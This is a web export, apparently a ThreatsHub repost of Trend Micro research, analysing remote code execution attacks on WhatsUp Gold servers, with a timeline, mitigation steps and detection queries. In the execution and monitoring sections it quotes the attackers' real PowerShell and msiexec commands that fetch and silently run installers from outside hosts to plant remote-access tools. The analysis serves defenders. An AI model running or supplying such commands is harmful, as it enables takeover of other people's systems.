{"id":57084,"date":"2024-09-12T00:00:00","date_gmt":"2024-09-12T00:00:00","guid":{"rendered":"urn:uuid:aac20ec2-ae7d-8418-ecf0-ef3ef68e2b21"},"modified":"2024-09-12T00:00:00","modified_gmt":"2024-09-12T00:00:00","slug":"protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/","title":{"rendered":"Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WhatsUpGoldRCE-Header:Large?qlt=80\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/WhatsUpGoldRCE-Header.jpg\" class=\"ff-og-image-inserted\"><\/div>\n<div readability=\"34.5\">\n<div readability=\"14\">\n<h4>How attacks were observed in Trend Vision One<\/h4>\n<h5><b>Initial access<\/b><\/h5>\n<p>Activity monitoring on Trend Vision One showed that a suspicious script retrieved from a suspicious URL was suddenly executed on the computer hosting WhatsUp Gold. The timeline prior to the incident showed no suspicious logon events, suspicious URLs accessed by users, or malware execution. These are typical events in the early stages of incidents, but if these have not appeared, it&#8217;s more likely that a vulnerability has been involved.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"36\">\n<div readability=\"17\">\n<p>The polling process <i>NmPoller.exe<\/i>, the WhatsUp Gold executable, seems to be able to host a script called Active Monitor PowerShell Script as a legitimate function (Figure 2). The threat actors in this case chose it to perform for remote arbitrary code execution.<\/p>\n<p>The malicious code that was executed by <i>NmPoller.exe<\/i> looks like this: The first part of the square is the prefix, and the last two lines are the malicious code submitted by the threat actor. Several variations of this part have been observed, as shown in Figure 3.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"32.5\">\n<div readability=\"10\">\n<h5><b>Execution<\/b><\/h5>\n<p>Multiple PowerShell scripts were executed via <i>NmPoller.exe<\/i>.<b> <\/b>The following scripts were executed as the malicious part multiple times combined with the prefix part described in the previous section:<\/p>\n<blockquote><p>(New-Object System.Net.WebClient).DownloadFile(&#8216;hxxps:\/\/webhook[.]site\/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837&#8242;,&#8217;c:\\\\programdata\\\\a.ps1&#8217;); powershell -exec bypass -file c:\\\\programdata\\\\a.ps1<\/p><\/blockquote>\n<blockquote><p>msiexec \/i hxxp:\/\/45.227.255[.]216:29742\/ddQCz2CkW8\/setup.msi \/Qn<\/p><\/blockquote>\n<blockquote><p>msiexec \/i hxxps:\/\/fedko[.]org\/wp-includes\/ID3\/setup.msi \/Qn<\/p><\/blockquote>\n<blockquote><p>iwr -uri hxxps:\/\/fedko[.]org\/wp-includes\/ID3\/setup.msi -outfile c:\\\\windows\\\\temp\\\\MSsetup.msi ; msiexec \/i c:\\\\windows\\\\temp\\\\MSsetup.msi \/Qn<\/p><\/blockquote>\n<p>The file a.ps1 contained only one line:<\/p>\n<blockquote><p>[&#8220;(New-Object System.Net.WebClient).DownloadFile(&#8216;hxxp:\/\/185.123.100[.]160\/access\/Remote Access-windows64-offline.exe?language=en&amp;app=61021689825303726412222891579678345108&amp;hostname=hxxp:\/\/185.123.100[.]160&#8242;,&#8217;C:\\\\programdata\\\\ftpd32.exe&#8217;);start-process C:\\\\programdata\\\\ftpd32.exe;&#8221;]<\/p><\/blockquote><\/div>\n<\/p><\/div>\n<div readability=\"34\">\n<div readability=\"13\">\n<h5><b>Persistence<\/b><\/h5>\n<p>In this case, the threat actor aimed to install remote administration tools through PowerShell. They attempted to install these four remote access tools (RATs) via <i>msiexec.exe<\/i> (Figure 4):<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Atera Agent<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Radmin<\/span><\/li>\n<li><span class=\"rte-red-bullet\">SimpleHelp Remote Access<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Splashtop Remote<\/span><\/li>\n<\/ul>\n<p>Atera Agent and Splashtop Remote were installed by a single msi installer retrieved from the URL, hxxps:\/\/fedko[.]org\/wp-includes\/ID3\/setup.msi.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"46.696648216482\">\n<div readability=\"39.323493234932\">\n<p>The incident was contained by MXDR team and no further impacts were observed. The threat actor has not yet been identified; however, the usage of multiple RATs suggests that it may be a ransomware actor.<\/p>\n<h4>Vulnerability discovery and exploit attempts<\/h4>\n<h5><b>Event timeline<\/b><\/h5>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>August 16, 2024<\/b> &#8211; The product vendor released the latest patch and the CVE numbers<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>August 30, 2024 5pm (UTC) <\/b>&#8211; The discoverer of the vulnerability published the PoC on GitHub<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>August 30, 2024 10pm (UTC)<\/b> &#8211; Trend Micro MXDR team observed the first incident that abused the legitimate process of WhatsUp Gold<\/span><\/li>\n<\/ul>\n<p>This timeline suggests that the exploit attempts may have been performed on the same day, just a few hours after the PoC was published. The PoC was released on the Friday before the long weekend in the US, which included a holiday, so it may have been difficult for many organizations to apply the patch immediately. However, the latest patch was provided before the PoC was released, so if there is information such as a fix high-severity vulnerability in the patch, planning to apply the patch early should help prevent damage even if no PoC is available.<\/p>\n<p>Censys has issued <a href=\"https:\/\/censys.com\/cve-2024-4885\/\" target=\"_blank\" rel=\"noopener\">an advisory<\/a> that they observed 1,207 exposed devices online for <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-4885\" target=\"_blank\" rel=\"noopener\">CVE-2024-4885<\/a>, another WhatsUp Gold vulnerability that has a CVSS score of 9.8 and was fixed in June. This may have attracted the attention of threat actors as an attack surface following the disclosure of serious vulnerabilities in June.<\/p>\n<h4>Mitigation<\/h4>\n<p>The affected host was affected due to the compromise of user authentication for WhatsUp Gold. Users of the product should take the following steps to avoid a similar impact:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Apply the latest patch as soon as possible.<\/b> Official documentation on the product, such as <a href=\"https:\/\/docs.progress.com\/bundle\/whatsupgold-release-notes-24-0\/page\/WhatsUp-Gold-2024.0-Release-Notes.html\" target=\"_blank\" rel=\"noopener\">release notes<\/a> and <a href=\"https:\/\/community.progress.com\/s\/article\/WhatsUp-Gold-Security-Bulletin-August-2024\" target=\"_blank\" rel=\"noopener\">security bulletins<\/a>, can be found on the vendor website.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Keep the management console or API endpoints under access control. <\/b>Avoid exposing corporate use products to the public internet to prevent to be found and scanned by threat actors.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Use a strong password. <\/b>Please note that even if you have already applied all patches and are not affected by the vulnerability, you could still be affected if you use a weak password (such as admin:admin) without access control.<\/span><\/li>\n<\/ul>\n<h4>Monitoring<\/h4>\n<p>To detect the attacks that we observed, we monitored process creation events from the following processes:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>{Install path for WhatsUp Gold}<\/i>\\nmpoller.exe<\/span><\/li>\n<\/ul>\n<p>For example, if <i>C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\nmpoller.exe<\/i> creates processes like the following, it is highly suspicious:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">&#8220;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&#8221; -exec bypass -file c:\\programdata\\a.ps1<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;C:\\Windows\\system32\\msiexec.exe&#8221; \/i hxxps:\/\/fedko[.]org\/wp-includes\/ID3\/setup.msi \/Qn<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;C:\\Windows\\system32\\msiexec.exe&#8221; \/i hxxp:\/\/45.227.255[.]216:29742\/ddQCz2CkW8\/setup.msi \/Qn<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;C:\\Windows\\system32\\msiexec.exe&#8221; \/i c:\\windows\\temp\\MSsetup.msi \/Qn<\/span><\/li>\n<\/ul>\n<h4>Query sample for Vision One Search app<\/h4>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Search method:<\/b> Endpoint Activity Data<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Query:<\/b> &#8220;nmpoller.exe&#8221; AND eventSubId:(2 OR 101 OR 109 OR 901)<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Monitoring tips:<\/b><\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Product restarting or daily logfile creation events will also appear in the results. Please monitor the events excluding regular events in your environment.<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">You can also monitor for spikes in the number of events in the search result (Figure 5).<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div readability=\"52.921220527046\">\n<div readability=\"51.437447988904\">\n<p>Observed attack techniques (OAT) detected using Vision One:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">External MSI Package Installation via Msiexec (High)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Suspicious RAT (SimpleHelp) Installation (Medium)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Suspicious RAT (AteraAgent) Installation (Medium)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Suspicious RAT (Splashtop) File Creation (Medium)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Malicious Software &#8211; PUA.Win32.RAdmin.E (Medium)<\/span><\/li>\n<\/ul>\n<p>Please note that in the implementation, <i>NmPoller.exe<\/i> can execute PowerShell scripts without launching another powershell.exe process. If you can monitor PowerShell scripts with Antimalware Scan Interface (AMSI), verify that all scripts executed by WhatsUp Gold\u2019s Active Monitor PowerShell Script function are the ones you expect. To reduce the monitoring effort, it is also a good idea to suspend the use of Active Monitor PowerShell Script function until the latest patch is applied.<\/p>\n<p>Also, because the vulnerability <a href=\"https:\/\/summoning.team\/blog\/progress-whatsup-gold-sqli-cve-2024-6670\/\" target=\"_blank\" rel=\"noopener\">CVE-2024-6670<\/a> is described as allowing the compromise of the user account, it is quite possible that attacks would be observed as other events. Considering this, until the latest patch is applied, it is worth tightening access controls to WhatsUp Gold as much as possible and closely monitoring the events of all related processes.<\/p>\n<h4>Conclusion<\/h4>\n<p>Patch management is still important but always difficult. In this case, the PoC was published several days after the patch was released, and an incident that appeared to be affected by the vulnerability was observed on the same day, just a few hours after published. This observed fact shows that if the vulnerability being fixed is marked as severe, it is strongly encouraged to apply the patch as soon as it is released, even if no PoC is available.<\/p>\n<p>The key to preventing incidents like this are not limited to patch management. There should be several defenses in place in addition patch management. The most common defenses to mitigate risks are access control and multi-factor authentication (MFA), which security teams can apply through best practices like:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Keeping hosts\/services for corporate use under access control instead of public access<\/b><\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Do not expose to the public internet the management consoles or API endpoints of products for corporate use to avoid being on threat actors scan lists.<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\"><b>Enabling MFA for all network logins<\/b><\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">To prevent account compromise, all user accounts (whether for enterprise or personal use) logging on over the network, or logging into Windows, Linux, or web applications, are encouraged to always have MFA enabled.<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Of course, do not forget to use a strong password that has never been used in other places.<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\"><b>Using passkeys<\/b><\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">If you have the option to use a <a href=\"https:\/\/fidoalliance.org\/passkeys\/\" target=\"_blank\" rel=\"noopener\">passkey<\/a> instead of a password, it would be a good idea to do so.<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Passkeys use a cryptographic key stored on the device for logins and the key is activated by local authentication such as users\u2019 biometric just like unlocking the device. Since no need for any passwords or any typing, it means no strings of characters are involved, it is resistant to phishing.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Maintaining a daily readiness and vigilance against cyberattacks is essential to ensuring that emergency response is targeted only at things that truly require it. We hope that after reading this article, security teams will once again check that no unintended hosts or services are exposed to the public internet as part of their peacetime preparations. This approach is now known as part of attack surface management.<\/p>\n<p>Organizations can also consider powerful security technologies such as <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\" target=\"_blank\" rel=\"noopener\">Trend Vision One\u2122<\/a>, which offers multilayered protection and behavior detection, helping block malicious tools and services before they can inflict damage on user machines and systems.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<p>Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/i\/whatsup-gold-rce.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, we provide an analysis of the recent remote code execution attacks related to Progress Software\u2019s WhatsUp Gold that possibly abused the vulnerabilities CVE-2024-6670 and CVE-2024-6671. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":57085,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9555,9509],"class_list":["post-57084","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-09-12T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WhatsUpGoldRCE-Header:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities\",\"datePublished\":\"2024-09-12T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/\"},\"wordCount\":1465,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities.jpg\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/\",\"name\":\"Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities.jpg\",\"datePublished\":\"2024-09-12T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities.jpg\",\"width\":976,\"height\":533},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/","og_locale":"en_US","og_type":"article","og_title":"Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-09-12T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WhatsUpGoldRCE-Header:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities","datePublished":"2024-09-12T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/"},"wordCount":1465,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/09\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities.jpg","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Exploits&amp;Vulnerabilities","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/","url":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/","name":"Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/09\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities.jpg","datePublished":"2024-09-12T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/09\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/09\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities.jpg","width":976,"height":533},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/protecting-against-rce-attacks-abusing-whatsup-gold-vulnerabilities\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services 